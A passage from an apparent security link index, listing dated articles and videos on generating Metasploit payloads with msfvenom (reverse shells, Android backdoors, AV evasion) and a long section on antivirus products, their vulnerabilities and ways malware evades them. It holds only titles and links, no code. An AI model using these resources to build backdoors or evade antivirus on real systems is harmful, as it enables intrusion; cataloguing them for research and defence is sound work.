MSFPC](https://n0where.net/msfvenom-payload-creator-msfpc) - 2017.07 [hackers] [Metasploit Basics, Part 9: Using msfvenom to Create Custom Payloads](https://www.hackers-arise.com/single-post/2017/07/31/Metasploit-Basics-Part-9-Using-msfvenom-to-Create-Custom-Payloads) - 2017.05 [secist] [Msfvenom学习总结](http://www.secist.com/archives/3353.html) - 2016.12 [8090] [Metasploit应用笔记-msfvenom生成meterpreter后门代码](http://www.8090-sec.com/archives/6215) - 2016.07 [korznikov] [msfvenom Bash Completion Generator](http://www.korznikov.com/2016/07/msfvenom-bash-completion-generator.html) - 2016.05 [blackhillsinfosec] [Advanced Msfvenom Payload Generation](https://www.blackhillsinfosec.com/advanced-msfvenom-payload-generation/) - 2015.07 [n0where] [Msfvenom Payload Creator: MPC](https://n0where.net/msfvenom-payload-creator-mpc) - 2015.07 [freebuf] [Meatsploit Framework msfvenom使用简介](http://www.freebuf.com/sectool/72135.html) - 2014.03 [rapid7] [Like msfvenom? Here's A Faster Way to Generate Stand-alone Metasploit Payloads](https://blog.rapid7.com/2014/03/28/like-msfvenom-heres-a-faster-way-to-generate-stand-alone-metasploit-payloads/) ### <a id="7730a4447da61926c4f582db6ee96b32"></a>Youtube - 2019.11 [LoiLiangYang] [Live Android Hacking with MSFVenom](https://www.youtube.com/watch?v=g77XXAKc9qA) - 2019.04 [JosephDelgadillo] [Learn System Hacking E9: Creating Windows Payloads with MSFvenom](https://www.youtube.com/watch?v=qRxA3_fBa-8) - 2019.04 [HackerSploit] [How To Setup Port Forwarding For Msfvenom Android Payloads (WAN)](https://www.youtube.com/watch?v=Tp3d_czVKT8) - 2019.03 [HackerSploit] [Manually Embedding Msfvenom Payloads In APK's - Proof Of Concept](https://www.youtube.com/watch?v=Eo68tayiGOA) - 2018.12 [HackerSploit] [Generating Shellcode With Msfvenom](https://www.youtube.com/watch?v=nNt_gRl8RBk) - 2018.07 [HackerSploit] [Generating Android Payloads With Msfvenom - Reverse TCP/Meterpreter](https://www.youtube.com/watch?v=ZfwxcAsZgWw) - 2018.06 [HackerSploit] [AV/IDS Evasion With Msfvenom - Payload Encoding Through Obfuscation](https://www.youtube.com/watch?v=ubXCiJ0fl-k) ### <a id="e59f6ecd26ef69cefe42e7362af6aa0f"></a>hackingarticles - 2018.03 [hackingarticles] [Generating Reverse Shell using Msfvenom (One Liner Payload)](http://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/) - 2017.11 [hackingarticles] [Msfvenom Tutorials for Beginners](http://www.hackingarticles.in/msfvenom-tutorials-beginners/) - 2017.04 [hackingarticles] [2 ways to use Msfvenom Payload with Netcat](http://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat/) - 2017.03 [hackingarticles] [Hiding Shell with Prepend Migrate using Msfvenom](http://www.hackingarticles.in/hiding-shell-prepend-migrate-using-msfvenom/) - 2017.03 [hackingarticles] [Capture VNC Session of Remote PC using Msfvenom](http://www.hackingarticles.in/capture-vnc-session-remote-pc-using-msfvenom/) - 2016.07 [hackingarticles] [Hack Remote Windows PC using Macros with Msfvenom](http://www.hackingarticles.in/hack-remote-windows-pc-using-macros-msfvenom/) - 2012.08 [hackingarticles] [Hack Remote Windows 7 PC Easy Way (Msfvenom Tutorial)](http://www.hackingarticles.in/hack-remote-windows-7-pc-easy-way-msfvenom-tutorial/) *** ## <a id="fd930c71d4f8d16ee4a993e04e618394"></a>AntiVirus - 2020.03 [0x00sec] [How to protect my virus.exe from Anti-virus with Kernel-Mode Rootkit](https://0x00sec.org/t/how-to-protect-my-virus-exe-from-anti-virus-with-kernel-mode-rootkit/19784) - 2020.01 [0x00sec] [Anti-virus Exploitation: Malwarebytes 4.0.4 - Protection Not Found - Hijacking Malwarebytes via COM IPC](https://0x00sec.org/t/anti-virus-exploitation-malwarebytes-4-0-4-protection-not-found-hijacking-malwarebytes-via-com-ipc/18766) - 2020.01 [BlackHat] [Windows Offender: Reverse Engineering Windows Defender's Antivirus Emulator](https://www.youtube.com/watch?v=wDNQ-8aWLO0) - 2019.11 [0x00sec] [Anti-virus Exploitation: Local Privilege Escalation in K7 Security (CVE-2019-16897)](https://0x00sec.org/t/anti-virus-exploitation-local-privilege-escalation-in-k7-security-cve-2019-16897/17655) - 2019.11 [0x00sec] [How do you think malware authors will adapt to AI/ML based Anti-Virus detection?](https://0x00sec.org/t/how-do-you-think-malware-authors-will-adapt-to-ai-ml-based-anti-virus-detection/17316) - 2019.10 [virusbulletin] [Stalkerware poses particular challenges to anti-virus products](https://www.virusbulletin.com/blog/2019/10/stalkerware-poses-particular-challenges-anti-virus-products/) - 2019.10 [HackersOnBoard] [Windows Offender Reverse Engineering Windows Defender's Antivirus Emulator](https://www.youtube.com/watch?v=LvW68czaEGs) - 2019.10 [sentinelone] [CyberSecurity Breakthrough Awards Name SentinelOne Overall Antivirus Solution Provider of 2019](https://www.sentinelone.com/blog/cybersecurity-breakthrough-awards-name-sentinelone-overall-antivirus-solution-provider-of-2019/) - 2019.09 [TechnicalMujeeb] [Termux Antivirus - install & use Antivirus in Termux - android](https://www.youtube.com/watch?v=zaYQHdDxTyM) - 2019.08 [rce4fun] [Comodo Antivirus - Sandbox Race Condition Use-After-Free (CVE-2019-14694)](http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html) - 2019.07 [microsoft] [How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection](https://www.microsoft.com/security/blog/2019/07/31/how-windows-defender-antivirus-integrates-hardware-based-system-integrity-for-informed-extensive-endpoint-protection/) - 2019.05 [rce4fun] [Panda Antivirus - Local Privilege Escalation (CVE-2019-12042)](http://rce4fun.blogspot.com/2019/05/panda-antivirus-local-privilege.html) - 2019.02 [cybereason] [Astaroth Malware Uses Legitimate OS and Antivirus Processes to Steal Passwords and Personal Data](https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research) - 2019.01 [crowdstrike] [Next-Gen Antivirus](https://www.crowdstrike.com/blog/tech-center/next-gen-antivirus/) - 2019.01 [kaspersky] [SiliVaccine: Antivirus from North Korea](https://www.kaspersky.com/blog/35c3-dprk-antivirus/25290/) - 2019.01 [csoonline] [Best Android antivirus? The top 13 tools](https://www.csoonline.com/article/3234769/best-android-antivirus-the-top-13-tools.html) - 2019.01 [trustlook] [Trustlook is one of the best Anti-Virus engines provider](https://blog.trustlook.com/2019/01/07/trustlook-is-one-of-the-best-anti-virus-engines-provider/) - 2019.01 [trustlook] [Trustlook is one of the best Anti-Virus engines provider](https://blog.trustlook.com/trustlook-is-one-of-the-best-anti-virus-engines-provider/) - 2019.01 [sans] [Anti-virus No Thanks](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1493863710.pdf) - 2019.01 [sans] [Antivirus is NOT Dead](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1493841233.pdf) - 2018.11 [stationx] [New Sandbox Mode for Windows 10 Defender Antivirus: Here’s why you should pay attention…](https://www.stationx.net/new-sandbox-mode-for-windows-10-defender-antivirus-heres-why-you-should-pay-attention/) - 2018.11 [csoonline] [Best Android antivirus? The top 13 tools](https://www.csoonline.com/article/3234769/mobile-security/best-android-antivirus-the-top-13-tools.html) - 2018.11 [antonioparata] [Sacara VM Vs Antivirus Industry](http://antonioparata.blogspot.com/2018/11/sacara-vm-vs-antivirus-industry.html) - 2018.11 [minerva] [How can malware authors determine whether their tools will be detected by antivirus solutions](https://blog.minerva-labs.com/how-can-malware-authors-determine-whether-their-tools-will-be-detected-by-antivirus-solutions) - 2018.11 [MalwareAnalysisForHedgehogs] [Why There Is No Perfect Antivirus Scanner](https://www.youtube.com/watch?v=gvo0guTh2DM) - 2018.10 [microsoft] [Windows Defender Antivirus can now run in a sandbox](https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/) - 2018.10 [gdatasoftware] [Next-Generation Antivirus: How G DATA can protect customers from unknown threats](https://www.gdatasoftware.com/blog/2018/10/31127-next-generation-antivirus-how-g-data-can-protect-customers-from-unknown-threats) - 2018.09 [kaspersky] [Why there’s no antivirus for iOS](https://www.kaspersky.com/blog/ios-security-explainer/23811/) - 2018.07 [ensurtec] [A story about “free” antivirus](https://ensurtec.com/a-story-about-free-antivirus/) - 2018.06 [csoonline] [Best Android antivirus? The top 12 tools](https://www.csoonline.com/article/3234769/mobile-security/best-android-antivirus-the-top-12-tools.html) - 2018.06 [alienvault] [SMBs: 3 Signs It’s Finally Time to Replace Your AntiVirus](https://www.alienvault.com/blogs/security-essentials/smbs-3-signs-its-finally-time-to-replace-your-antivirus) - 2018.06 [arxiv] [[1806.04773] Static Malware Detection & Subterfuge: Quantifying the Robustness of Machine Learning and Current Anti-Virus](https://arxiv.org/abs/1806.04773) - 2018.06 [landave] [F-Secure的反病毒软件受7z的RCE漏洞影响](https://landave.io/2018/06/f-secure-anti-virus-remote-code-execution-via-solid-rar-unpacking/) - 2018.05 [360] [挖矿软件利用Windows内置工具躲避杀软](https://blog.360totalsecurity.com/en/cryptominer-nsasrvanyminer-exploits-microsoft-tool-penetrate-antivirus/) - 2018.05 [trendmicro] [Operators of Counter Antivirus Service Scan4You Convicted](https://blog.trendmicro.com/trendlabs-security-intelligence/operators-of-counter-antivirus-service-scan4you-convicted/) - 2018.05 [csoonline] [Best Android antivirus? The top 11 tools](https://www.csoonline.com/article/3234769/mobile-security/best-android-antivirus-the-top-11-tools.html) - 2018.05 [checkpoint] [SiliVaccine: A Special Report Into North Korea’s Anti-Virus](https://blog.checkpoint.com/2018/05/01/silivaccine-special-report-north-koreas-anti-virus/) - 2018.05 [checkpoint] [朝鲜本土的AV软件SiliVaccine分析. SiliVaccine的核心组件"参考"了趋势科技10年前软件组件的代码](https://research.checkpoint.com/silivaccine-a-look-inside-north-koreas-anti-virus/) - 2018.04 [infosecinstitute] [Configuration of Anti-Virus and Anti-Malware Software within an ICS Environment](http://resources.infosecinstitute.com/configuration-anti-virus-anti-malware-software-within-ics-environment/) - 2018.03 [cybereason] [由AutoHotKey脚本编写的窃密软件Fauxpersky分析](https://www.cybereason.com/blog/fauxpersky-credstealer-malware-autohotkey-kaspersky-antivirus) - 2018.03 [Sorsnce] [PowerShell Anti-Virus with VirusTotal API](https://medium.com/p/e5b3f46a158e) - 2018.03 [microsoft] [Why Windows Defender Antivirus is the most deployed in the enterprise](https://cloudblogs.microsoft.com/microsoftsecure/2018/03/22/why-windows-defender-antivirus-is-the-most-deployed-in-the-enterprise/) - 2018.03 [mikefrobbins] [Remotely Uninstall ESET Antivirus with PowerShell](https://mikefrobbins.com/2018/03/01/remotely-uninstall-eset-antivirus-with-powershell/) - 2018.01 [greyhathacker] [使用函数 SeTakeOwnershipPrivilege 实现利用AV软件 System Shield 的任意内存写入漏洞(CVE-2018-5701)](http://www.greyhathacker.net/?p=1006) - 2018.01 [blackhillsinfosec] [Treating Antivirus as “The Gold Standard”](https://www.blackhillsinfosec.com/treating-antivirus-gold-standard/) - 2018.01 [struppigel] [Interpreting Antivirus Detection Names](https://struppigel.blogspot.com/2018/01/interpreting-antivirus-detection-names.html) - 2018.01 [cylance] [Reverse Engineered Antivirus Detects Classified Documents](https://www.cylance.com/en_us/blog/reverse-engineered-antivirus-detects-classified-documents.html) - 2018.01 [silentsignal] [Bare Knuckled Antivirus Breaking](https://blog.silentsignal.eu/2018/01/08/bare-knuckled-antivirus-breaking/) - 2018.01 [sans] [Fake anti-virus pages popping up like weeds](https://isc.sans.edu/forums/diary/Fake+antivirus+pages+popping+up+like+weeds/23207/) - 2017.12 [securiteam] [SSD Advisory – Kingsoft Antivirus/Internet Security 9+ Privilege Escalation](https://blogs.securiteam.com/index.php/archives/3597) - 2017.12 [nettitude] [An insight into antivirus testing: are you protected by your endpoint security?](https://blog.nettitude.com/an-insight-into-antivirus-testing-are-you-protected-by-your-endpoint-security) - 2017.12 [microsoft] [Detonating a bad rabbit: Windows Defender Antivirus and layered machine learning defenses](https://cloudblogs.microsoft.com/microsoftsecure/2017/12/11/detonating-a-bad-rabbit-windows-defender-antivirus-and-layered-machine-learning-defenses/) - 2017.12 [forensiccontrol] [Is Kaspersky Anti-virus Software in Deep Trouble? – IT security matters](https://forensiccontrol.com/kaspersky-anti-virus-software-2/) - 2017.12 [myonlinesecurity] [Using Antivirus Software and The Risk of Abuse by Nation States](https://myonlinesecurity.co.uk/using-antivirus-software-and-the-risk-of-abuse-by-nation-states/) - 2017.12 [f] [Antivirus in the Hot Seat, with Mikko Hypponen](https://blog.f-secure.com/podcast-antivirus-mikko-hypponen/) - 2017.12 [f] [[New Podcast] Antivirus in the Hot Seat, with Mikko Hypponen](https://business.f-secure.com/podcast-cyber-security-sauna-episode-1) - 2017.11 [securiteam] [SSD安全公告–Ikraus Anti Virus 远程代码执行漏洞](https://blogs.securiteam.com/index.php/archives/3542) - 2017.11 [cybereason] [How new threats curb the effectiveness of antivirus and next-generation antivirus](https://www.cybereason.com/blog/-how-new-threats-curb-the-effectiveness-of-antivirus-and-next-generation-antivirus) - 2017.11 [theevilbit] [Turning CVE-2017-14961 (IKARUS anti.virus local kernel exploit) into full arbitrary read / write with PALETTE objects](http://theevilbit.blogspot.com/2017/11/turning-cve-2017-14961-ikarus-antivirus.html) - 2017.11 [binarydefense] [New Vulnerability Uses Antivirus Software to Inject Malware](https://www.binarydefense.com/new-vulnerability-uses-antivirus-software-to-inject-malware/) - 2017.11 [greyhathacker] [反病毒软件 IKARUS 的9个内核漏洞](http://www.greyhathacker.net/?p=995) - 2017.11 [ensurtec] [Antivirus Bug Can Be Used to Attack You](https://ensurtec.com/antivirus-bug/) - 2017.11 [binarydefense] [New Vulnerability Uses Antivirus Software to Inject Malware](https://blog.binarydefense.com/new-vulnerability-uses-antivirus-software-to-inject-malware) - 2017.11 [greyhathacker] [AV 软件 Vir.ITeXplorer 任意写入漏洞利用](http://www.greyhathacker.net/?p=990) - 2017.10 [cylance] [Antivirus: Understanding Why You Should Test for Yourself](https://www.cylance.com/en_us/blog/antivirus-understanding-why-you-should-test-for-yourself.html) - 2017.10 [securityledger] [Antivirus Software is dying. What will replace it?](https://securityledger.com/2017/10/antivirus-software-dying-will-replace/) - 2017.10 [cybereason] [Why antivirus software is becoming the rootkit you pay for](https://www.cybereason.com/blog/why-antivirus-software-is-becoming-the-rootkit-you-pay-for) - 2017.10 [securiteam] [SSD Advisory – Ikraus Anti Virus Remote Code Execution](https://blogs.securiteam.com/index.php/archives/3485) - 2017.10 [randy] [VirusTotal, Equifax, and Antimalware Products](http://randy-abrams.blogspot.com/2017/10/virustotal-equifax-and-antimalware.html) - 2017.10 [ensurtec] [How Much Do You Trust Your Antivirus Company?](https://ensurtec.com/much-trust-antivirus-company/) - 2017.10 [stationx] [Kaspersky Labs Antivirus.. Should you stop using it?](https://www.stationx.net/kaspersky-labs-antivirus-stop-using/) - 2017.10 [malwarejake] [Should Antivirus software be part of your threat model?](http://malwarejake.blogspot.com/2017/10/should-antivirus-software-be-part-of.html) - 2017.10 [NullByte] [Rogue Devices: Antivirus Disabler Script on the USB Rubber Ducky](https://www.youtube.com/watch?v=4Re6w5xYXnc) - 2017.09 [4hou] [保护你还是kill你?杀毒软件(DU Antivirus Security)窃取用户数据背后的真相](http://www.4hou.com/info/news/7764.html) - 2017.09 [checkpoint] [Does Your Mobile Anti-Virus App Protect Or Infect You? The Truth Behind DU Antivirus Security | Check Point Software Blog](https://blog.checkpoint.com/2017/09/18/does-your-mobile-anti-virus-app-protect-or-infect-you/) - 2017.09 [checkpoint] [研究人员发现中国手机反病毒 App DU Antivirus Security 窃取用户数据](https://research.checkpoint.com/mobile-anti-virus-app-protect-infect-truth-behind-du-antivirus-security/) - 2017.08 [deepsec] [Mythbusting: Anti-Virus Research considered dangerous](http://blog.deepsec.net/mythbusting-anti-virus-research-considered-dangerous/) - 2017.08 [ehacking] [What’s the Future of Anti-Viruses, Signature Based or Real Time Anomaly Based?](https://academy.ehacking.net/blog/10894/what-s-the-future-of-anti-viruses-signature-based-or-real-time-anomaly-based) - 2017.08 [ehacking] [What’s the Future of Anti-Viruses, Signature Based or Real Time Anomaly Based?](https://academy.ehacking.net/blog/1054372/what-s-the-future-of-anti-viruses-signature-based-or-real-time-anomaly-based) - 2017.08 [asd] [Antivirus Software using Reputation Rating Checking](https://asd.gov.au/publications/protect/antivirus-software-reputation-checking.htm) - 2017.08 [landave] [F-Secure Anti-Virus: Arbitrary Free Vulnerability via TNEF](https://landave.io/2017/08/f-secure-anti-virus-arbitrary-free-vulnerability-via-tnef/) - 2017.08 [crowdstrike] [Four Steps to Choosing the Right Antivirus Replacement](https://www.crowdstrike.com/blog/four-steps-to-choosing-the-right-antivirus-replacement/) - 2017.07 [DoktorCranium] [Kaspersky Free Antivirus on Windows 10 vs. Metasploit](https://www.youtube.com/watch?v=5ZhUqlFVoow) - 2017.07 [DoktorCranium] [Kaspersky Free Antivirus vs. Metasploit](https://www.youtube.com/watch?v=No9FIFZik9A) - 2017.07 [ringzerolabs] [2017 Best Free Antivirus Solutions from a Malware Analysts Perspective](https://www.ringzerolabs.com/2017/07/2017-best-free-antivirus-solutions-from.html) - 2017.07 [mrg] [Limitations of Android AntiVirus Scanners](https://www.mrg-effitas.com/research/limitations-of-android-antivirus-scanners/) - 2017.07 [microsoft] [Windows Defender Antivirus cloud protection service: Advanced real-time defense against never-before-seen malware](https://cloudblogs.microsoft.com/microsoftsecure/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/) - 2017.07 [checkpoint] [SandBlast Agent Backs Up Anti-Virus by Preventing Recently Discovered Malware](https://research.checkpoint.com/sandblast-agent-backs-up-anti-virus-by-preventing-recently-discovered-malware/) - 2017.07 [malwarejake] [Is antivirus software part of your threat model? Maybe it should be...](http://malwarejake.blogspot.com/2017/07/is-antivirus-software-part-of-your.html) - 2017.06 [landave] [Announcing a New Blog Series on Anti-Virus Software](https://landave.io/2017/06/announcing-a-new-blog-series-on-anti-virus-software/) - 2017.06 [arxiv] [[1706.05779] Hey, you, keep away from my device: remotely implanting a virus expeller to defeat Mirai on IoT devices](https://arxiv.org/abs/1706.05779) - 2017.06 [malwarebytes] [Announcing Malwarebytes Endpoint Protection, a next-generation antivirus replacement for businesses](https://blog.malwarebytes.com/malwarebytes-news/2017/06/announcing-malwarebytes-endpoint-protection-next-generation-antivirus-replacement-businesses/) - 2017.06 [riskiq] [Thanks, But No Thanks: RiskIQ Identifies Hundreds of  Malicious ‘Antivirus’ Apps, Capitalizing on Ransomware Fears and Putting Users at Risk](https://www.riskiq.com/blog/external-threat-management/malicious-antivirus-apps/) - 2017.05 [cylance] [How Traditional Antivirus Works](https://www.cylance.com/en_us/blog/how-traditional-antivirus-works.html) - 2017.03 [welivesecurity] [Cybersecurity: weighing up the value of antivirus software](https://www.welivesecurity.com/2017/03/22/economics-cybersecurity-undecided/) - 2017.03 [esecurityplanet] [Anti-Virus Solutions Fail to Protect Against Ransomware](https://www.esecurityplanet.com/malware/anti-virus-solutions-fail-to-protect-against-ransomware.html) - 2017.03 [malwarebytes] [Free antivirus coupon leads to tech support scam](https://blog.malwarebytes.com/threat-analysis/2017/03/free-antivirus-coupon-leads-tech-support-scam/) - 2017.02 [cylance] [Antivirus Testing for Real World Failure](https://www.cylance.com/en_us/blog/antivirus-testing-for-real-world-failure.html) - 2017.02 [activecanopy] [Is your organization protected with your Anti-Virus subscription?…think again.](https://activecanopy.com/locky-or-not-competitive-ransomware/) - 2017.02 [mcafee] [Large Healthcare Company Standardizes on McAfee ENS 10.5 and McAfee MOVE AntiVirus to Protect 100,000+ Physical and Virtual Endpoints](https://securingtomorrow.mcafee.com/business/large-healthcare-company-standardizes-mcafee-ens-10-5-mcafee-move-antivirus-protect-100000-physical-virtual-endpoints/) - 2017.02 [cybereason] [Why next-generation antivirus requires more than building a better mousetrap](https://www.cybereason.com/blog/blog-why-next-generation-antivirus-still-isnt-enough-to-protect-enterprises) - 2017.02 [kaspersky] [Count the awards: Choosing an antivirus solution](https://www.kaspersky.com/blog/kaspersky-antiviruses-awarded/13942/) - 2017.02 [virusbulletin] [The Living Dead Anti-Virus](https://www.virusbulletin.com/blog/2017/01/living-dead-anti-virus/) - 2017.02 [nviso] [Working with GFI Cloud anti-virus quarantine files](https://blog.nviso.be/2017/02/01/working-with-gfi-cloud-anti-virus-quarantine-files/) - 2017.01 [HackersOnBoard] [DEF CON 24 - How to Do it Wrong: Smartphone Antivirus and Security Applications Under Fire](https://www.youtube.com/watch?v=gOSogzEsHWQ) - 2017.01 [myonlinesecurity] [Antivirus detections and why the initial response is so important](https://myonlinesecurity.co.uk/antivirus-detections-and-why-the-initial-response-is-so-important/) - 2017.01 [mikefrobbins] [Using PowerShell to Audit Antivirus Updates on your Servers](http://mikefrobbins.com/2017/01/05/using-powershell-to-audit-antivirus-updates-on-your-servers/) - 2016.12 [malwarebytes] [Announcing Malwarebytes 3.0, a next-generation antivirus replacement](https://blog.malwarebytes.com/malwarebytes-news/2016/12/announcing-malwarebytes-3-0-a-next-generation-antivirus-replacement/) - 2016.12 [heimdalsecurity] [The best (free) security software to complement your antivirus](https://heimdalsecurity.com/blog/antivirus-is-dead-nextgen-anti-hacking-tools/) - 2016.11 [pluginvulnerabilities] [CWIS Antivirus Scanner Plugin Spreading False Reports of Vulnerabilities In WordPress Plugins](https://www.pluginvulnerabilities.com/2016/11/21/cwis-antivirus-scanner-plugin-spreading-false-reports-of-vulnerabilities-in-wordpress-plugins/) - 2016.11 [virusbulletin] [Throwback Thursday: The Politics of Anti-Virus](https://www.virusbulletin.com/blog/2016/november/throwback-thursday-politics-anti-virus/) - 2016.10 [PNPtutorials] [#6 - Setup || How to Install/Use ANTIVIRUS for Kali Linux ? || 1080 || HD](https://www.youtube.com/watch?v=TClqJDkDysw) - 2016.10 [arxiv] [[1610.06022] From Malware Signatures to Anti-Virus Assisted Attacks](https://arxiv.org/abs/1610.06022) - 2016.09 [checkpoint] [Antivirus Isn’t Dead, But It’s No Panacea | Check Point Software Blog](https://blog.checkpoint.com/2016/09/29/antivirus-isnt-dead-but-its-no-panacea/) - 2016.09 [talosintelligence] [Kaspersky Anti-Virus Unhandled Windows Messages Denial of Service Vulnerability](https://talosintelligence.com/vulnerability_reports/TALOS-2016-0175) - 2016.08 [malwarebytes] [Unpacking the spyware disguised as antivirus](https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/) - 2016.08 [kaspersky] [The evolution of reputational antivirus technologies](https://www.kaspersky.com/blog/reputational-technologies/5899/) - 2016.08 [sophos] [Sophos Home rated “Best Free Mac Antivirus” by Tom’s Guide](https://news.sophos.com/en-us/2016/08/16/sophos-home-rated-best-free-mac-antivirus-by-toms-guide/) - 2016.07 [breakdev] [Defeating Antivirus Real-time Protection From The Inside](https://breakdev.org/defeating-antivirus-real-time-protection-from-the-inside/) - 2016.06 [duo] [That Big Symantec Antivirus Bug](https://duo.com/blog/that-big-symantec-antivirus-bug) - 2016.06 [detectify] [IT Security FAQ 9: What is the difference between a firewall, antivirus and services like Detectify? | Detectify Blog](https://blog.detectify.com/2016/06/08/it-security-faq-9-what-is-the-difference-between-a-firewall-antivirus-and-other-security-services-like-detectify/) - 2016.06 [seowhistleblower] [Instantly Scan a File with 50+ Anti-Virus Programs! (Microsoft, McAfee, and more)](https://www.youtube.com/watch?v=WoVvFOfiR8I) - 2016.05 [alienvault] [Antivirus or Host IDS, Your Last Line of Defense](https://www.alienvault.com/blogs/security-essentials/antivirus-or-host-ids-your-last-line-of-defense) - 2016.05 [voidsec] [The Curse of the Antivirus Solution](https://voidsec.com/the-curse-of-the-antivirus-solution/) - 2016.05 [sans] [CVE-2016-2208 Symantec Antivirus Engine Malformed PE Header Parser Memory Access Violation](https://isc.sans.edu/forums/diary/CVE20162208+Symantec+Antivirus+Engine+Malformed+PE+Header+Parser+Memory+Access+Violation/21069/) - 2016.05 [securityevaluators] [What Anti-Virus Should I Use?](https://blog.securityevaluators.com/what-anti-virus-should-i-use-20e61a3f702d) - 2016.04 [trendmicro] [Trend Micro Rated “Best Antivirus Software”](http://blog.trendmicro.com/trend-micro-rated-best-antivirus-software/) - 2016.04 [hackingtutorials] [How does antivirus software work?](https://www.hackingtutorials.org/malware-analysis-tutorials/how-does-antivirus-software-work/) - 2016.04 [trustlook] [Trustlook Antivirus & Mobile Security Android Video](https://blog.trustlook.com/2016/04/09/trustlook-antivirus-mobile-security-android-video/) - 2016.03 [trustwave] [TWSL2016-003: Sophos Anti-Virus Mac OS X Version Update File Unlinking Vulnerability](https://www.trustwave.com/Resources/SpiderLabs-Blog/TWSL2016-003--Sophos-Anti-Virus-Mac-OS-X-Version-Update-File-Unlinking-Vulnerability/) - 2016.02 [myonlinesecurity] [Eset antivirus and Eset Smart Security blocks Google](https://myonlinesecurity.co.uk/eset-antivirus-and-eset-smart-security-blocks-google/) - 2016.01 [metaflows] [Measured Antivirus Effectiveness](https://www.metaflows.com/blog/measured-antivirus-effectiveness/) - 2016.01 [securityintelligence] [Is Your Antivirus Software Vulnerable to Attack?](https://securityintelligence.com/is-your-antivirus-software-vulnerable-to-attack/) - 2016.01 [fortinet] [Android Spywaller: Firewall-Style Antivirus Blocking](https://www.fortinet.com/blog/threat-research/android-spywaller-firewall-style-antivirus-blocking.html) - 2016.01 [hackingarticles] [How to Gather Information of Antivirus in Remote Victim PC using Metasploit](http://www.hackingarticles.in/how-to-gather-information-of-antivirus-in-remote-victim-pc-using-metasploit/) - 2016.01 [cyberoxen] [Here’s the Best Antivirus Software for Windows 7, 8.1, and 10 PCs](http://www.cyberoxen.com/2016/01/02/heres-the-best-antivirus-software-for-windows-7-8-1-and-10-pcs/) - 2015.12 [malwarebytes] [PUPs Masquerade as Installer for Antivirus and Anti-Adware](https://blog.malwarebytes.com/puppum/2015/12/pups-masquerade-as-installer-for-antivirus-and-anti-adware/) - 2015.11 [malwarebytes] [Three Reasons Why Anti-Virus Alone is No Longer Enough](https://blog.malwarebytes.com/101/2015/11/three-reasons-why-anti-virus-alone-is-no-longer-enough/) - 2015.11 [f5] [Dyre Update: Moving to Edge and Windows 10 with Anti-Antivirus](https://f5.com/labs/articles/threat-intelligence/malware/dyre-update-moving-to-edge-and-windows-10-with-anti-antivirus-22452) - 2015.11 [welivesecurity] [Schrödinger's antivirus: The immortality of antivirus software](https://www.welivesecurity.com/2015/11/04/schrodingers-antivirus-immortality-antivirus-software/) - 2015.11 [redcanary] [Does Next-Generation Anti-Virus Solve the Fatal Flaws of Anti-Virus?](https://redcanary.com/blog/next-generation-anti-virus-solve-fatal-flaws-anti-virus/) - 2015.10 [sector] [Is Anti-Virus Software Really Dead?](https://sector.ca/is-anti-virus-software-really-dead/) - 2015.10 [amossys] [A peek inside antivirus’ cloud features](http://blog.amossys.fr/A_peek_inside_antivirus_cloud_features.html) - 2015.09 [krebsonsecurity] [ATM Skimmer Gang Firebombed Antivirus Firm](https://krebsonsecurity.com/2015/09/atm-skimmer-gang-firebombed-antivirus-firm/) - 2015.09 [malwarebytes] [What’s the difference between antivirus and anti-malware?](https://blog.malwarebytes.com/101/2015/09/whats-the-difference-between-antivirus-and-anti-malware/) - 2015.09 [krebsonsecurity] [Like Kaspersky, Russian Antivirus Firm Dr.Web Tested Rivals](https://krebsonsecurity.com/2015/09/like-kaspersky-russian-antivirus-firm-dr-web-tested-rivals/) - 2015.08 [securityintelligence] [Dyre Summer Renovation: Randomized Config File Names Keep Antivirus Engines Guessing](https://securityintelligence.com/dyre-summer-renovation-randomized-config-file-names-keep-antivirus-engines-guessing/) - 2015.08 [virusbulletin] [Back to the future: anti-virus engines and sandboxes](https://www.virusbulletin.com/blog/2015/08/back-future-anti-virus-engines-and-sandboxes/) - 2015.08 [trendmicro] [Antivirus Alone Is NOT Enough Protection for Today’s Sophisticated Threats](http://blog.trendmicro.com/antivirus-alone-is-not-enough-protection-for-todays-sophisticated-threats/) - 2015.07 [deepsec] [New MJS Article: Why Anti-Virus Software Fails](http://blog.deepsec.net/new-mjs-article-why-anti-virus-software-fails/) - 2015.07 [checkpoint] [ZoneAlarm Launches Windows 10 Compatible Antivirus Software for Consumers](https://www.checkpoint.com/press/2015/zonealarm-launches-windows-10-compatible-antivirus-software-for-consumers/) - 2015.06 [virusbulletin] [NSA, GCHQ found to target anti-virus products](https://www.virusbulletin.com/blog/2015/06/nsa-gchq-found-target-anti-virus-products/) - 2015.05 [securityblog] [Get installed antivirus in C](http://securityblog.gr/2695/get-installed-antivirus-in-c/) - 2015.05 [360] [New exploit kit targets Chinese computers without 360 antivirus](https://blog.360totalsecurity.com/en/new-exploit-kit-targets-chinese-computers-without-360-antivirus/) - 2015.05 [csoonline] [Old-school anti-virus vendors learn new tricks](https://www.csoonline.com/article/2919567/data-protection/old-school-anti-virus-vendors-learn-new-tricks.html) - 2015.05 [virusbulletin] [Report: six anti-virus solutions pass annual Linux test](https://www.virusbulletin.com/blog/2015/05/report-six-anti-virus-solutions-pass-annual-linux-test/) - 2015.04 [dreamsofastone] [Anti-virus 1980ies style](http://dreamsofastone.blogspot.com/2015/04/anti-virus-1980ies-style.html) - 2015.03 [cylance] [Five Dirty Secrets of the Antivirus Industry](https://www.cylance.com/en_us/blog/five-dirty-secrets-of-the-antivirus-industry.html) - 2015.03 [checkpoint] [Check Point Reveals New RCE Vulnerability in BitDefender Anti-Virus | Check Point Software Blog](https://blog.checkpoint.com/2015/03/19/check-point-reveals-new-rce-vulnerability-bitdefender-anti-virus/) - 2015.03 [trustlook] [Fake Antivirus Found on Google Play](https://blog.trustlook.com/2015/03/17/fake-antivirus-found-on-google-play/) - 2015.02 [metaflows] [Network Antivirus White List and 